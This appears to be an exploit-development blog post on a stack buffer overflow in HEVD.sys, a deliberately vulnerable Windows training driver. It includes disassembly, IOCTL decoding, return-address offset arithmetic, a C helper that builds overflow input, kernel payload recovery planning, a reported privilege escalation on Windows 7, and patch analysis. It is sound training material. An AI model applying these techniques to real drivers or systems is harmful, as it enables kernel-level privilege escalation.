
Brief

The vulnerability class that we are going to hunt for and exploit is a Stack Buffer Overflow in the HEVD.sys Windows driver, in a routine that is not protected by a stack cookie/canary (/GS Buffer Security Check) or a StackGuard-style mitigation. We are also going to look at productization and stabilization of the exploit later on.

We are only going to consider Intel 64 (the 64-bit version of the x86 ISA) targets in this blog post unless explicitly stated otherwise.

Vulnerability

First off, we should grab the latest version of the HEVD binary that we are going to exploit. I am going to use HEVD v3.00.

Our next step is, of course, to load the vulnerable version of the binary in IDA Pro for static analysis. You could also use IDA Free/Demo/Home or any other disassembler of your choice. The Hex-Rays decompiler is not strictly necessary, although it certainly helps.

We will be utilizing the provided PDB symbol file, which will greatly aid us in reverse engineering (RE). Later on, we will also take a look at the patch to discuss how the vulnerability was fixed.

A useful IDA Pro plugin for initial automated analysis of Windows drivers is DriverBuddyReloaded by VoidSec. It may provide us with a useful starting point and save some time in the process.

After opening the binary, we land in the GsDriverEntry() routine, which doesn’t look anything like the DriverEntry() routine that we are familiar with. It is inserted by the compiler when the code is compiled with the /GS compiler flag: it initializes the security cookie used to detect buffer overruns and then calls the driver’s real entry point.

hevd-gs-entry-point
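To see why that initialization matters, here is a toy user-mode model of the idea behind /GS, not the real MSVC implementation. On x64, a protected function typically stores the global __security_cookie XORed with RSP between its local buffers and the saved data, and verifies it (via __security_check_cookie) before returning. The frame layout, the placeholder cookie value and every name below are assumptions made for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy frame (hypothetical layout): local buffer, then the cookie slot, then the return address. */
typedef struct {
    unsigned char buffer[64];
    uint64_t cookie;
    uint64_t retaddr;
} toy_frame;

static_assert(offsetof(toy_frame, cookie) == 64, "cookie sits right after the buffer");

/* Placeholder for the global cookie; the real one is randomized during initialization. */
static uint64_t toy_global_cookie = 0x1122334455667788ull;

/* Prologue: store the global cookie XORed with a frame-specific value (here, the frame address). */
static void toy_prologue(toy_frame *f)
{
    f->cookie = toy_global_cookie ^ (uint64_t)(uintptr_t)f;
}

/* Epilogue check: true if the cookie survived, i.e. the function would be allowed to return. */
static bool toy_epilogue_ok(const toy_frame *f)
{
    return (f->cookie ^ (uint64_t)(uintptr_t)f) == toy_global_cookie;
}

/* Unchecked copy starting at the buffer; clamped to the toy object so the model stays defined C. */
static void toy_copy(toy_frame *f, const void *src, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    memcpy((unsigned char *)f, src, len);
}
```

An in-bounds copy leaves the cookie intact, while any copy long enough to reach the return address must first run over the cookie slot, so the epilogue check fails before the corrupted return address is ever used.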

We can simply follow the call to the function appropriately named DriverEntry_0() here. Now this looks more like it! We can already see the device name string and the MS-DOS device name string being used to initialize nt!_UNICODE_STRING structures with the nt!RtlInitUnicodeString() routine.

hevd-real-entry-point
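For reference, here is a minimal portable sketch of what nt!RtlInitUnicodeString() sets up: the nt!_UNICODE_STRING length fields are byte counts rather than character counts, and Buffer simply points at the source string without copying it. The struct mirror, the helper name and the example device name used with it are hypothetical; WCHAR is modeled as char16_t.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <uchar.h>

static_assert(sizeof(char16_t) == 2, "WCHAR is modeled as a 16-bit code unit");

/* Hypothetical portable mirror of nt!_UNICODE_STRING. */
typedef struct {
    uint16_t Length;          /* size of the string in bytes, excluding the terminating NUL */
    uint16_t MaximumLength;   /* size of the buffer in bytes, including the terminating NUL */
    const char16_t *Buffer;   /* points at the caller's string; nothing is copied */
} unicode_string_model;

/* Mimics RtlInitUnicodeString() for a NUL-terminated source string (or NULL). */
static void init_unicode_string_model(unicode_string_model *dst, const char16_t *src)
{
    size_t chars = 0;

    dst->Buffer = src;
    if (src == NULL) {
        dst->Length = dst->MaximumLength = 0;
        return;
    }
    while (src[chars] != 0)
        chars++;
    dst->Length = (uint16_t)(chars * sizeof(char16_t));
    dst->MaximumLength = (uint16_t)(dst->Length + sizeof(char16_t));
}
```

With a hypothetical u"\\Device\\Example" (15 characters), Length comes out as 30 and MaximumLength as 32.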

We can use the Hex-Rays decompiler to decompile this function and note three things that are of concern to us:

  1. Creation of the named device object for the driver using the nt!IoCreateDevice() routine. Notably, it doesn’t use the nt!IoCreateDeviceSecure() routine, which lets the driver apply access control to the device object. This potentially implies that any process running on the system, even one with a Low Integrity Level token, can open a handle to this device object.
  2. Creation of a symbolic link object to the device using the nt!IoCreateSymbolicLink() routine, supplying the MS-DOS device name for the device object. This is necessary for a user-mode application to work with the driver.
  3. Setting the pointer to the DispatchDeviceControl dispatch routine in the MajorFunction[] array of the driver object to handle IRP_MJ_DEVICE_CONTROL requests. For more information, refer to the MSDN documentation on the nt!_DRIVER_OBJECT structure and IRP_MJ_DEVICE_CONTROL.

hevd-real-entry-point-decompiled

Now that we have found the driver dispatch routine that handles IRPs with the IRP_MJ_DEVICE_CONTROL major function code, we can start looking for the functionality implemented by the driver that we can trigger from a user-mode client application by sending the appropriate IOCTL code and I/O parameters with the kernel32!DeviceIoControl() routine.

Scrolling down a bit, we find a call to the stack buffer overflow IOCTL handler, thanks to the helpful debug prints baked into the code (yes, this sometimes happens in production builds too!)

hevd-dispatch-device-control-stack-buffer-overflow

But what is the IOCTL code through which we can take this code path?

Well, we just scroll up a bit in the control flow graph and spot some code that checks whether ECX == 0x222003 and, if so, jumps to the location we highlighted above. Looks like we have found the IOCTL code that triggers the stack buffer overflow!

hevd-stack-buffer-overflow-ioctl

We can now decode the IOCTL code using the OSR Online IOCTL Decoder.

hevd-stack-buffer-overflow-ioctl-decoded
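The decoder is just undoing the bit packing of the CTL_CODE macro from the Windows headers. Here is a minimal sketch of the same decoding, assuming the standard field layout (device type in bits 31..16, required access in bits 15..14, function code in bits 13..2, transfer method in bits 1..0); the macro, type and helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Same bit layout as CTL_CODE(DeviceType, Function, Method, Access) in the Windows headers. */
#define MY_CTL_CODE(dev, func, method, access) \
    (((uint32_t)(dev) << 16) | ((uint32_t)(access) << 14) | ((uint32_t)(func) << 2) | (uint32_t)(method))

#define MY_FILE_DEVICE_UNKNOWN 0x22u
#define MY_FILE_ANY_ACCESS     0u
#define MY_METHOD_NEITHER      3u

typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14 */
    uint32_t function;    /* bits 13..2  */
    uint32_t method;      /* bits 1..0   */
} ioctl_fields;

static ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Re-encoding the decoded fields gives back the value compared against ECX in the dispatch routine. */
static_assert(MY_CTL_CODE(MY_FILE_DEVICE_UNKNOWN, 0x800, MY_METHOD_NEITHER, MY_FILE_ANY_ACCESS) == 0x222003u,
              "FILE_DEVICE_UNKNOWN, function 0x800, METHOD_NEITHER, FILE_ANY_ACCESS");
```

Calling decode_ioctl(0x222003) yields device type 0x22 (FILE_DEVICE_UNKNOWN), access 0 (FILE_ANY_ACCESS), function 0x800 and method 3 (METHOD_NEITHER).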

The most notable fact here is that it uses the METHOD_NEITHER transfer type, which means the I/O manager neither validates nor copies the caller’s buffers: they stay in the User Virtual Address Space (UVAS), are not copied to the Kernel Virtual Address Space (KVAS), and the driver receives the raw user-mode pointers. It is up to the driver to implement proper sanity checks to determine whether the buffers are safe to access.

Let’s take a gander at the disassembly and decompilation of the stack buffer overflow IOCTL handler using IDA Pro and the Hex-Rays decompiler:

PAGE:0000000140086594     ; =============== S U B R O U T I N E =======================================
PAGE:0000000140086594
PAGE:0000000140086594
PAGE:0000000140086594     ; int __fastcall BufferOverflowStackIoctlHandler(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)
PAGE:0000000140086594     BufferOverflowStackIoctlHandler proc near
PAGE:0000000140086594                                             ; CODE XREF: IrpDeviceIoCtlHandler+1D6↑p
PAGE:0000000140086594                                             ; DATA XREF: .pdata:0000000140084144↑o
PAGE:0000000140086594     Irp = rcx
PAGE:0000000140086594     IrpSp = rdx
PAGE:0000000140086594 000                 sub     rsp, 28h
PAGE:0000000140086598 028                 mov     Irp, [IrpSp+20h] ; UserBuffer
PAGE:000000014008659C 028                 mov     eax, 0C0000001h
PAGE:00000001400865A1 028                 mov     edx, [IrpSp+10h] ; Size
PAGE:00000001400865A4 028                 test    Irp, Irp
PAGE:00000001400865A7 028                 jz      short loc_1400865AE
PAGE:00000001400865A9 028                 call    TriggerBufferOverflowStack
PAGE:00000001400865AE
PAGE:00000001400865AE     loc_1400865AE:                          ; CODE XREF: BufferOverflowStackIoctlHandler+13↑j
PAGE:00000001400865AE 028                 add     rsp, 28h
PAGE:00000001400865B2 000                 retn
PAGE:00000001400865B2     BufferOverflowStackIoctlHandler endp
PAGE:00000001400865B2
PAGE:00000001400865B2     ; ---------------------------------------------------------------------------

hevd-stack-buffer-overflow-ioctl-handler-decompiled

Apart from a NULL check on the buffer pointer (it returns STATUS_UNSUCCESSFUL, 0xC0000001, if the pointer is NULL), the only thing this function does is extract the pointer to the user’s input buffer and its length from the current I/O stack location and call the HEVD!TriggerBufferOverflowStack() routine with the extracted values as arguments. These values were copied as-is by the I/O manager from the user-mode client application’s request into the nt!_IRP and its accompanying nt!_IO_STACK_LOCATION structure(s), without any form of checking.
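The two offsets used by the handler, [IrpSp+10h] and [IrpSp+20h], line up with Parameters.DeviceIoControl.InputBufferLength and Parameters.DeviceIoControl.Type3InputBuffer in the x64 layout of nt!_IO_STACK_LOCATION. The sketch below is a trimmed, hypothetical mirror (only the fixed header and the DeviceIoControl arm of the Parameters union) that checks those offsets with offsetof and models the handler’s NULL check. It assumes a 64-bit compiler and that each ULONG in that arm is 8-byte aligned, as POINTER_ALIGNMENT does in 64-bit WDK builds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static_assert(sizeof(void *) == 8, "a 64-bit build is assumed");

/* Hypothetical mirror of the Parameters.DeviceIoControl arm (ULONGs padded to 8 bytes). */
typedef struct {
    _Alignas(8) uint32_t OutputBufferLength;
    _Alignas(8) uint32_t InputBufferLength;   /* read as Size:       [IrpSp+10h] */
    _Alignas(8) uint32_t IoControlCode;
    void *Type3InputBuffer;                   /* read as UserBuffer: [IrpSp+20h] */
} device_io_control_params;

/* Hypothetical, trimmed mirror of the fixed part of nt!_IO_STACK_LOCATION. */
typedef struct {
    uint8_t MajorFunction;
    uint8_t MinorFunction;
    uint8_t Flags;
    uint8_t Control;
    device_io_control_params Parameters;      /* starts at +8 due to its 8-byte alignment */
} io_stack_location_x64;

#define PARAM_OFFSET(field) \
    (offsetof(io_stack_location_x64, Parameters) + offsetof(device_io_control_params, field))

static_assert(PARAM_OFFSET(InputBufferLength) == 0x10, "matches mov edx, [IrpSp+10h]");
static_assert(PARAM_OFFSET(Type3InputBuffer) == 0x20, "matches mov rcx, [IrpSp+20h]");

/* Models BufferOverflowStackIoctlHandler(): returns 0 when it would go on to call
 * TriggerBufferOverflowStack(*buffer, *size), STATUS_UNSUCCESSFUL for a NULL buffer. */
static uint32_t extract_user_buffer(const io_stack_location_x64 *sp, void **buffer, size_t *size)
{
    *buffer = sp->Parameters.Type3InputBuffer;
    *size = sp->Parameters.InputBufferLength; /* 32-bit load, zero-extended like mov edx */
    return *buffer != NULL ? 0u : 0xC0000001u;
}
```

Note that nothing in this path looks at Size; it is passed straight through to the copy routine.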

It looks as though the hunt is finally over as we descend upon the function which is so helpfully named TriggerBufferOverflowStack():

PAGE:00000001400865B4     ; =============== S U B R O U T I N E =======================================
PAGE:00000001400865B4
PAGE:00000001400865B4
PAGE:00000001400865B4     ; __int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
PAGE:00000001400865B4     TriggerBufferOverflowStack proc near    ; CODE XREF: BufferOverflowStackIoctlHandler+15↑p
PAGE:00000001400865B4                                             ; DATA XREF: .pdata:0000000140084150↑o
PAGE:00000001400865B4
PAGE:00000001400865B4     KernelBuffer    = dword ptr -818h
PAGE:00000001400865B4     var_18          = byte ptr -18h
PAGE:00000001400865B4     arg_0           = qword ptr  8
PAGE:00000001400865B4     arg_8           = qword ptr  10h
PAGE:00000001400865B4     arg_10          = qword ptr  18h
PAGE:00000001400865B4
PAGE:00000001400865B4     UserBuffer = rcx
PAGE:00000001400865B4     Size = rdx
PAGE:00000001400865B4     ; __unwind { // __C_specific_handler
PAGE:00000001400865B4 000                 mov     [rsp+arg_0], rbx
PAGE:00000001400865B9 000                 mov     [rsp+arg_8], rsi
PAGE:00000001400865BE 000                 mov     [rsp+arg_10], rdi
PAGE:00000001400865C3 000                 push    r12
PAGE:00000001400865C5 008                 push    r14
PAGE:00000001400865C7 010                 push    r15
PAGE:00000001400865C9 018                 sub     rsp, 820h
PAGE:00000001400865D0 838                 mov     rsi, Size
PAGE:00000001400865D3 838                 mov     rdi, UserBuffer
PAGE:00000001400865D6 838                 xor     ebx, ebx
PAGE:00000001400865D8 838                 mov     r12d, 800h
PAGE:00000001400865DE 838                 mov     r8d, r12d       ; Size
PAGE:00000001400865E1 838                 xor     edx, edx        ; Val
PAGE:00000001400865E3 838                 lea     UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:00000001400865E8 838                 call    memset
PAGE:00000001400865ED 838                 nop
PAGE:00000001400865EE
PAGE:00000001400865EE     loc_1400865EE:                          ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:00000001400865EE     ;   __try { // __except at $LN6_0       ; Alignment
PAGE:00000001400865EE 838                 lea     r8d, [rbx+1]
PAGE:00000001400865F2 838                 mov     edx, r12d       ; Length
PAGE:00000001400865F5 838                 mov     UserBuffer, rdi ; Address
PAGE:00000001400865F8 838                 call    cs:__imp_ProbeForRead
PAGE:00000001400865FE 838                 mov     r9, rdi
PAGE:0000000140086601 838                 lea     r8, aUserbuffer0xP ; "[+] UserBuffer: 0x%p\n"
PAGE:0000000140086608 838                 lea     r15d, [rbx+3]
PAGE:000000014008660C 838                 mov     edx, r15d       ; Level
PAGE:000000014008660F 838                 lea     r14d, [rbx+4Dh]
PAGE:0000000140086613 838                 mov     ecx, r14d       ; ComponentId
PAGE:0000000140086616 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008661C 838                 mov     r9, rsi
PAGE:000000014008661F 838                 lea     r8, aUserbufferSize ; "[+] UserBuffer Size: 0x%X\n"
PAGE:0000000140086626 838                 mov     edx, r15d       ; Level
PAGE:0000000140086629 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008662C 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086632 838                 lea     r9, [rsp+838h+KernelBuffer]
PAGE:0000000140086637 838                 lea     r8, aKernelbuffer0x ; "[+] KernelBuffer: 0x%p\n"
PAGE:000000014008663E 838                 mov     edx, r15d       ; Level
PAGE:0000000140086641 838                 mov     ecx, r14d       ; ComponentId
PAGE:0000000140086644 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008664A 838                 mov     r9d, r12d
PAGE:000000014008664D 838                 lea     r8, aKernelbufferSi ; "[+] KernelBuffer Size: 0x%X\n"
PAGE:0000000140086654 838                 mov     edx, r15d       ; Level
PAGE:0000000140086657 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008665A 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086660 838                 lea     r8, aTriggeringBuff_2 ; "[+] Triggering Buffer Overflow in Stack"...
PAGE:0000000140086667 838                 mov     edx, r15d       ; Level
PAGE:000000014008666A 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008666D 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086673 838                 mov     r8, rsi         ; MaxCount
PAGE:0000000140086676 838                 mov     Size, rdi       ; Src
PAGE:0000000140086679 838                 lea     UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:000000014008667E 838                 call    memmove
PAGE:0000000140086683 838                 jmp     short loc_1400866A0
PAGE:0000000140086683     ;   } // starts at 1400865EE
PAGE:0000000140086685     ; ---------------------------------------------------------------------------
PAGE:0000000140086685
PAGE:0000000140086685     $LN6_0:                                 ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:0000000140086685     ;   __except(1) // owned by 1400865EE
PAGE:0000000140086685 838                 mov     ebx, eax
PAGE:0000000140086687 838                 mov     r9d, eax
PAGE:000000014008668A 838                 lea     r8, aExceptionCode0 ; "[-] Exception Code: 0x%X\n"
PAGE:0000000140086691 838                 mov     edx, 3          ; Level
PAGE:0000000140086696 838                 lea     ecx, [Size+4Ah] ; ComponentId
PAGE:0000000140086699 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008669F 838                 nop
PAGE:00000001400866A0
PAGE:00000001400866A0     loc_1400866A0:                          ; CODE XREF: TriggerBufferOverflowStack+CF↑j
PAGE:00000001400866A0 838                 mov     eax, ebx
PAGE:00000001400866A2 838                 lea     r11, [rsp+838h+var_18]
PAGE:00000001400866AA 838                 mov     rbx, [r11+20h]
PAGE:00000001400866AE 838                 mov     rsi, [r11+28h]
PAGE:00000001400866B2 838                 mov     rdi, [r11+30h]
PAGE:00000001400866B6 838                 mov     rsp, r11
PAGE:00000001400866B9 018                 pop     r15
PAGE:00000001400866BB 010                 pop     r14
PAGE:00000001400866BD 008                 pop     r12
PAGE:00000001400866BF 000                 retn
PAGE:00000001400866BF     ; } // starts at 1400865B4
PAGE:00000001400866BF     TriggerBufferOverflowStack endp

hevd-stack-buffer-overflow-decompiled

The issue here (highlighted in red for your reading pleasure) is apparent. On one hand, we have a local buffer, KernelBuffer (the Dst argument of the memmove() call), occupying 0n2048/0x800 bytes on the stack. On the other hand, we have an unsafe routine, memmove(), that takes attacker-controlled input data and an attacker-controlled size as arguments and copies the data into the buffer on the stack without any form of size validation, making it possible to overflow its bounds and corrupt adjacent data on the stack. The preceding ProbeForRead() call does not help here: it only verifies that the first 0x800 bytes of UserBuffer lie in user-mode memory (its Length argument is R12D = 0x800, not Size), and the surrounding __try/__except only catches exceptions raised while accessing that memory.

This bug appears to be exploitable in practice too, because both the input data and the input size are completely attacker-controlled, without any constraints.
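To make the consequence concrete, here is a small user-mode model of the frame. The field names are illustrative; the layout follows the prologue in the listing: KernelBuffer at RSP+0x20, then the R15, R14 and R12 values pushed by the prologue, then the return address. The copy is applied to the frame the same way the driver applies memmove() to KernelBuffer, except that the model clamps the length to its own struct so that the demonstration stays well-defined C (the driver has no such clamp).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model of TriggerBufferOverflowStack()'s frame, lowest address first. */
typedef struct {
    uint8_t  kernel_buffer[0x800]; /* rsp+0x20 .. rsp+0x81F                 */
    uint64_t saved_r15;            /* rsp+0x820 (pushed last)                */
    uint64_t saved_r14;            /* rsp+0x828                              */
    uint64_t saved_r12;            /* rsp+0x830 (pushed first)               */
    uint64_t retaddr;              /* rsp+0x838, consumed by the final retn  */
} trigger_frame;

static_assert(offsetof(trigger_frame, retaddr) == 0x818, "matches KernelBuffer = -818h in IDA");

/* Models memmove(KernelBuffer, UserBuffer, Size) with an attacker-chosen Size. */
static void model_memmove(trigger_frame *f, const void *user_buffer, size_t size)
{
    if (size > sizeof *f)
        size = sizeof *f; /* model-only clamp */
    memmove((unsigned char *)f, user_buffer, size);
}
```

A 0x800-byte request stays inside KernelBuffer, while a 0x820-byte request rewrites all three saved registers and the return address.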

Exploitation and Stabilization

Our objective is to exploit this vulnerability to achieve arbitrary code execution in kernel mode. We said that the vulnerability lets us corrupt data on the stack, but how does corrupting random stack data help us in any way, except maybe by causing a glorious bugcheck on the device?

Well, as you might know, the call instruction pushes the return address (the address of the instruction following the call) onto the stack before setting the (really) extended instruction pointer (EIP/RIP) to the call target, and the ret instruction pops the value at the top of the stack into EIP/RIP. Both are control flow instructions, as they change the instruction pointer (a pointer to the next instruction to execute).

So what if we could overwrite a retaddr on the stack with the address of a payload buffer that we control? When the function returns, our payload gets executed instead!
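The mechanism can be illustrated with a toy machine, a hypothetical model rather than a faithful emulation of x86: call pushes the address of the next instruction and jumps, and ret blindly pops whatever sits in that stack slot into the instruction pointer. Overwriting the slot between the two is all it takes to redirect execution.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy machine: a downward-growing stack of 64-bit slots and an instruction pointer. */
typedef struct {
    uint64_t stack[16];
    size_t   sp;   /* index of the current top slot; 16 means the stack is empty */
    uint64_t rip;
} toy_cpu;

/* call: push the address of the next instruction, then jump to the target. */
static void toy_call(toy_cpu *c, uint64_t next_insn, uint64_t target)
{
    assert(c->sp > 0);
    c->stack[--c->sp] = next_insn;
    c->rip = target;
}

/* ret: pop the top slot into the instruction pointer, whatever it now contains. */
static void toy_ret(toy_cpu *c)
{
    assert(c->sp < 16);
    c->rip = c->stack[c->sp++];
}
```

If the slot written by toy_call() is overwritten before toy_ret() runs, the instruction pointer ends up at the overwritten value instead of the original return site.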

Now that we have defined our exploitation strategy, let’s discuss some potential problems and how we can resolve them:

  1. Legacy and modern exploit mitigations such as KASLR, DEP, GS Cookie, KPP/PatchGuard, SMEP, SMAP, KPTI, kCFG, HyperGuard, HVCI, KCET etc.
  • Some of them are not applicable here, some can be avoided entirely or bypassed, and others will thwart us completely. We will discuss them in detail on a case-by-case basis.
  2. Where do we put our payload?
  • In the User Virtual Address Space (UVAS).
  3. What happens if our payload’s UVA gets paged out before we are done?
  • We lock the payload pages into physical memory (e.g. with kernel32!VirtualLock()), ensuring that they cannot be written out to the pagefile.
  4. How do we know how much stack data to corrupt to precisely overwrite the retaddr, and not some other arbitrary data on the stack, which may lead to system instability?
  • To answer this, we must first draw the complete stack layout with the help of the disassembly shown above:
    hevd-stack-buffer-overflow-stack-layout
    Note that the offsets here are relative to the stack base containing the retaddr. From this diagram, we can see that after we overflow the bounds of the 0x800-byte KernelBuffer (Dst) and then the three non-volatile register values also saved on the stack, we can finally overwrite the retaddr (ergo, retaddr offset = 0x800 + 0x8 * 0n3 = 0x818). I’ve seen some writeups use cyclic pattern generators for this purpose, so feel free to confirm the above using Overflow Exploit Pattern Generator - Online Tool by @zerosum0x0. One thing to mention here is that we irreparably trash the three saved non-volatile register values (R12, R14 and R15) on the way to the retaddr, which is not ideal for stability but also unavoidable in our case.
  5. How do we pick up the original control flow and return to user mode after our payload finishes executing, now that we have utterly messed up the stack?
  • There are quite a few approaches to kernel-mode payload recovery or transitioning from ring 0 to ring 3 after successful exploitation; however, it is hard to find a universal method that is equally reliable or optimal for every scenario. Ergo, we will again discuss them in detail on a case-by-case basis.
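The 0x818 figure can also be derived mechanically from the prologue constants, and the same offset dictates the layout of the input buffer: filler up to the retaddr, then 8 bytes of address in little-endian order. A minimal sketch, assuming a 64-bit target address that stands in for wherever the payload ends up in UVAS (no payload is built here; the helper names are hypothetical). Stopping right after the retaddr, at 0x820 bytes in total, matters: the prologue saved RBX, RSI and RDI in the home space just above the retaddr, and the epilogue restores them from there.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constants read off TriggerBufferOverflowStack()'s prologue and locals. */
enum {
    LOCAL_ALLOC     = 0x820, /* sub rsp, 820h                                */
    PUSHED_REGS     = 3,     /* push r12 / push r14 / push r15               */
    KBUF_RSP_OFFSET = 0x20,  /* [rsp+838h+KernelBuffer] with KernelBuffer = -818h */
    KBUF_SIZE       = 0x800  /* memset(KernelBuffer, 0, 800h)                */
};

static_assert(LOCAL_ALLOC + 8 * PUSHED_REGS == 0x838, "retaddr sits at rsp+838h after the prologue");

/* Distance from the start of KernelBuffer to the saved return address. */
static size_t retaddr_offset(void)
{
    size_t retaddr_rsp_offset = LOCAL_ALLOC + 8u * PUSHED_REGS; /* 0x838 */
    return retaddr_rsp_offset - KBUF_RSP_OFFSET;                 /* 0x818 */
}

/* Writes filler up to the retaddr, then `target` in little-endian byte order.
 * Returns the number of bytes to send, or 0 if `out` is too small. */
static size_t build_overflow_input(uint8_t *out, size_t out_len, uint64_t target)
{
    size_t off = retaddr_offset();
    if (out_len < off + 8)
        return 0;
    memset(out, 'A', off);         /* KernelBuffer, then the saved R15, R14 and R12 */
    for (int i = 0; i < 8; i++)    /* x86-64 stores qwords little-endian */
        out[off + i] = (uint8_t)(target >> (8 * i));
    return off + 8;                /* stop here: the RBX/RSI/RDI home slots stay intact */
}
```

The returned length (0x820) and the filled buffer are what would be handed to DeviceIoControl() as the input buffer and input size for IOCTL 0x222003.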

Case I

  • Intel OS Guard/SMEP not present, KVA Shadow/KPTI disabled
  • Target
    • Windows 7, or an OS newer than Windows 7 running on older Intel hardware (μarch older than Ivy Bridge)
    • Intel processor that is not vulnerable to Rogue Data Cache Load/Meltdown/Variant 3/CVE-2017-5754, or without the Meltdown patch (KPTI disabled)
  • Proof of Concept

This is the easiest case to deal with, as there are no kernel security mitigations to defeat, so we will start with this one (baby steps!)

Kernel-mode Payload Recovery

To figure out the best (and perhaps also the easiest) approach for our case, we need to consult the disassembly of the caller of HEVD!TriggerBufferOverflowStack() and find the location where our callee would normally have returned, had the control flow not been hijacked to execute our payload.

hevd-stack-buffer-overflow-recovery-stub

Once we have identified it, we can append the code stub (highlighted in red) to our payload, execute it ourselves, and thereby return to the IRP_MJ_DEVICE_CONTROL IRP handler, which eventually returns out of kernel mode without crashing the system.

Demo

Here is a screenshot demonstrating successful exploitation of this vulnerability on a fully updated Windows 7 system, using a modified PINKPANTHER payload to achieve Local Privilege Escalation (LPE):

hevd-stack-buffer-overflow-lpe-poc

Patch Analysis

So what was the fix? We can load the “secure” version of the binary into IDA Pro to find out.

hevd-stack-buffer-overflow-patch-analysis

Quite simple, as it turns out: enforce strict bounds. As you might notice, the size parameter to memmove() is no longer attacker-controlled; it is fixed to sizeof(KernelBuffer) bytes, which means that we can no longer overrun this buffer on the stack.
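The difference between the two builds boils down to where the memmove() length comes from. A minimal sketch of that arithmetic (the function names are hypothetical):

```c
#include <assert.h>
#include <stddef.h>

#define KERNEL_BUFFER_SIZE 0x800u /* sizeof(KernelBuffer) */

static_assert(KERNEL_BUFFER_SIZE == 2048u, "0x800 bytes, i.e. 0n2048");

/* Vulnerable build: memmove(KernelBuffer, UserBuffer, Size), Size chosen by the caller. */
static size_t vulnerable_copy_len(size_t user_size) { return user_size; }

/* Patched build: the length argument is fixed to sizeof(KernelBuffer). */
static size_t patched_copy_len(size_t user_size)
{
    (void)user_size; /* ignored entirely */
    return KERNEL_BUFFER_SIZE;
}

/* Bytes that would be written past the end of KernelBuffer for a given copy length. */
static size_t bytes_past_buffer(size_t copy_len)
{
    return copy_len > KERNEL_BUFFER_SIZE ? copy_len - KERNEL_BUFFER_SIZE : 0;
}
```

One side effect of a fixed length is that the patched routine always reads sizeof(KernelBuffer) bytes from the user buffer, even when the caller supplied fewer. Clamping to the smaller of Size and sizeof(KernelBuffer) would be an alternative design, not what the patched binary does.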

Honourable Mention

Throughout this blog post, I have assumed that readers are already familiar with setting up a Windows test VM with full kernel debugging support and have done so. If that’s not the case, I’d implore you to give this a read: CodeMachine System setup for kernel development and debugging guide